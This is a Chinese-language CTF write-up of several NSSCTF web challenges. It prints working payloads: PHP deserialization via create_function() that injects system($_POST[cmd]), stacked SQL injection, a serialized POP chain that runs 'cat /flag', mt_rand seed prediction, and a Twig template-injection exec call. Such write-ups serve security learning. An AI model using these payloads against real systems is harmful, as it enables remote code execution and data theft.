NSSCTF第15页（3）

 [FSCTF 2023]CanCanNeed

这道题有一个简单的反序列化，然后正则限制了很多函数

看了wp才知道利用的函数是create_function()函数

create_function()函数利用_create function函数的用法-CSDN博客

PHP代码 之create_function()函数-CSDN博客

<?php
class Noteasy{
    protected $param1= "create_function";
    protected $param2="};system(\$_POST[cmd]);//";

}
$a= new Noteasy();
echo base64_encode(serialize($a));

看目录

 看flag

[HNCTF 2022 WEEK4]fun_sql

源码

分析一下，首先是过滤了一些关键字，给出了sql查询语句为单引号闭合；然后是mysqli_multi_query()函数可以处理多条语句，那么可以使用堆叠注入；最后检测查询结果第二位是否为变量uname的值，如果是则返回flag

?uname=-1' union select 1,2,3;#

知道了回显位之后，就可以进行注入，但是这道题限制了太多，就可以直接插入一个uname=1

然后再进行查询就可以得到flag

?uname=-1' union select 1,2,3;insert into ccctttfff value(1,1,1);#

得到了flag

第一次做这种题，和二次注入感觉有点类似，但是又不一样

 [SWPUCTF 2023 秋季新生赛]UnS3rialize

反序列化，考察pop链的构造

class NSS
{
    public $cmd;
    function __invoke()
    {
        echo "Congratulations!!!You have learned to construct a POP chain<br/>";
        system($this->cmd);
    }
    function __wakeup()
    {
        echo "W4keup!!!<br/>";
        $this->cmd = "echo Welcome to NSSCTF";
    }
}
 

在NSS类里看到了system函数，知道这是pop链的终端，调用的__invoke()函数

__invoke()魔术方法 ： 将对象当作函数来使用时执行此方法

class C
{
    public $whoami;
    function __get($argv)
    {
        echo "what do you want?";
        $want = $this->whoami;
        return $want();
    }
}

继续向上找，就是在C类的return $want();中，在这里want被当做函数处理，触发方式便是__get()魔术方法

__get() ：获得一个类的成员变量时调用,用于从不可访问的成员获取值的时候触发

class T
{
    public $sth;
    function __toString()
    {
        echo "Now you know how to use __toString<br/>There is more than one way to trigger";
        return $this->sth->var;
    }
}  

向上找，在T类中的return $this->sth->var;这里希望返回sth类中的var属性，但是不存在，所以可以通过该语句触发__get()魔术方法，但是前提是先触发__toString()魔术方法

    __toString()： 当一个对象被当作字符串使用时触发

class F
{
    public $user = "nss";
    public $passwd = "ctf";
    public $notes;
    function __construct($user, $passwd)
    {
        $this->user = $user;
        $this->passwd = $passwd;
    }
    function __destruct()
    {
        if ($this->user === "SWPU" && $this->passwd === "NSS") {
                echo "Now you know how to use __construct<br/>";
                echo "your notes".$this->notes;
        }else{
            die("N0!");
        }
    }
} 

最后便是在F类中的__destruct()魔术方法的echo语句，将notes作为字符串处理，这便是pop链的触发点，因为__desrtuct()会自动触发

    __destruct() ：对象被销毁时触发

最后还要注意有一个__wakeup()函数需要绕过

pop链

F::__desrtuct()->T::__toString()->C::__get()->NSS::__invoke()

 

 修改一下数量

O:1:"F":3:{s:4:"user";s:4:"SWPU";s:6:"passwd";s:3:"NSS";s:5:"notes";O:1:"T":1:{s:3:"sth";O:1:"C":1:{s:6:"whoami";O:3:"NSS":1:{s:3:"cmd";s:4:"ls /";}}}}

O:1:"F":4:{s:4:"user";s:4:"SWPU";s:6:"passwd";s:3:"NSS";s:5:"notes";O:1:"T":1:{s:3:"sth";O:1:"C":1:{s:6:"whoami";O:3:"NSS":1:{s:3:"cmd";s:4:"ls /";}}}}

进行base64编码

?ser=TzoxOiJGIjo0OntzOjQ6InVzZXIiO3M6NDoiU1dQVSI7czo2OiJwYXNzd2QiO3M6MzoiTlNTIjtzOjU6Im5vdGVzIjtPOjE6IlQiOjE6e3M6Mzoic3RoIjtPOjE6IkMiOjE6e3M6Njoid2hvYW1pIjtPOjM6Ik5TUyI6MTp7czozOiJjbWQiO3M6NDoibHMgLyI7fX19fQ== 

cat /flag

O:1:"F":4:{s:4:"user";s:4:"SWPU";s:6:"passwd";s:3:"NSS";s:5:"notes";O:1:"T":1:{s:3:"sth";O:1:"C":1:{s:6:"whoami";O:3:"NSS":1:{s:3:"cmd";s:9:"cat /flag";}}}}

得到flag

?ser=TzoxOiJGIjo0OntzOjQ6InVzZXIiO3M6NDoiU1dQVSI7czo2OiJwYXNzd2QiO3M6MzoiTlNTIjtzOjU6Im5vdGVzIjtPOjE6IlQiOjE6e3M6Mzoic3RoIjtPOjE6IkMiOjE6e3M6Njoid2hvYW1pIjtPOjM6Ik5TUyI6MTp7czozOiJjbWQiO3M6OToiY2F0IC9mbGFnIjt9fX19== 

 [UUCTF 2022 新生赛]phonecode

题目提示是你能猜到验证码吗？

进去之后发现hint的数字一直在变

当手机号和验证码都是1的时候，发现没在变了

结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时，每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次，而目的验证码就是mt_rand的第二次 

我们写代码 弄出第二次的mt_rand

mt_srand(123);
echo mt_rand()."\n";  //895547922
echo mt_rand()."\n";  //2141438069

输入第二次的验证码，得到了flag

主要还是伪随机的验证

PHP mt_srand() 函数 | 菜鸟教程

PHP mt_rand() 函数 | 菜鸟教程

 [BJDCTF 2020]Cookie is so subtle!

在hint页面的代码

输入{{7*7}}得到的49，知道了是模板注入

 {{7*'7'}}会在 Twig 中返回49，而在 Jinja2 中则是7777777

输入了之后发现是twig模板

注入发现被限制了

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("ls /")}}

结合题目，应该是要admin登录，cookie认证

应该是要user传参了

看目录显示不全

得到flag